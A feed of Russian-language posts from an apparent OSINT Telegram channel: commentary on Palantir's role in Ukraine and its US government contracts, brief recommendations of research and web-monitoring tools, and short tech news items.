Palantir активно участвует в конфликте на Украине, предоставляя свои технологии украинским военным и госструктурам. Компания развернула системы анализа данных и искусственного интеллекта, которые используются для планирования операций и оценки угроз. Для Palantir это возможность протестировать свои разработки в реальных боевых условиях.

Параллельно компания укрепляет позиции на американском рынке госзаказов:

1. Palantir стала поставщиком технологий генеративного ИИ (GenAI) для Госдепартамента США. Их системы, включая чат-бот StateChat, будут использоваться для работы с конфиденциальными данными. Компания была выбрана из 44 претендентов, которые участвовали в тендере.

2. В июне 2024 года компания получила контракт как единственный поставщик на 80 миллионов долларов от Военно-воздушных и космических сил США.
Информация по контракту:

o Платформа Palantir будет использоваться несколькими операционными центрами для интеграции данных и аналитики.

o Система способна работать на всех уровнях секретности: от несекретной до совершенно секретной информации .

o Платформа может быть развернута в сетевой среде Special Access Program, обслуживая более 30 000 пользователей.

o Она обеспечивает круглосуточный доступ к критически важным данным для агентств Космических сил США (USSF), Штаб-квартиры Военно-воздушных сил (HAF), Североамериканского командования воздушно-космической обороны (USNORAD) и Северного командования США (USNORTHCOM).

o Ключевая функция - быстрое обнаружение, предупреждение и прогнозирование угроз национальным, союзным и коммерческим космическим системам.

o Платформа поддерживает динамическое оповещение, генерацию ключевых показателей эффективности, оперативное планирование и моделирование орбит.

Эти контракты демонстрируют тесную связь Palantir с американским военно-промышленным комплексом и спецслужбами. Компания фактически становится ключевым игроком в сфере обработки секретной информации и поддержки военных операций США.

Такая стратегия, совмещающая коммерческие проекты с крупными оборонными заказами и участием в международных конфликтах, обеспечивает Palantir стабильный рост.

Palantir превращается в технологического гиганта, такого как Apple, Microsoft, Nvidia, Alphabet, Amazon, только при этом глубоко интегрированного в системы Министерства обороны США.

🔒DARPA&CIA

Интернет-Розыск I OSINT I Киберрасследования

15 Oct, 17:01


🔤 Typeset - инструмент ИИ предоставляет короткую выжимку с выводами, основываясь на найденных научных исследованиях по заданной вами теме. К тому же, дает ссылки на сами исследования. Есть бесплатные запросы.

➡️https://typeset.io/

ℹ️ Российский альтернативный сервис:

➡️https://inventorus.ru/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #AI #SCIINT

Интернет-Розыск I OSINT I Киберрасследования

15 Oct, 15:01


🔤 Visualping - ресурс пришлет вам уведомление, когда на указанной вами ссылке что-то изменится. Программа делает скриншот и сверяет его с предыдущим. Таким образом она замечает изменения на веб-странице или ее части. Может быть использован для мониторинга нахождения в сети того или иного пользователя или появления скидок.

➡️https://visualping.io/

ℹ️ В качестве альтернативы:

➡️http://www.watchthatpage.com/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #MONITORING #SITE

Интернет-Розыск I OSINT I Киберрасследования

15 Oct, 13:07


Власти Казахстана анонсировали скорое открытие в республике официального представительства мессенджера Telegram. Впрочем, как и готовность к совместной работе с Казахстаном со стороны крупнейших американских ИТ-корпораций.

Интернет-Розыск I OSINT I Киберрасследования

15 Oct, 12:01


🔤 Carrot² — это система кластеризации результатов поиска с открытым исходным кодом. Он может автоматически группировать небольшие коллекции документов, например? результаты поиска или рефераты документов, в тематические категории.

➡️https://search.carrot2.org/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SEARCH

Интернет-Розыск I OSINT I Киберрасследования

15 Oct, 11:08


📌👮‍♀️ Вовремя я... Сервисы Google на базе Android могут быть заблокированы. Риски достаточно высокие - сообщили в Ростелеком.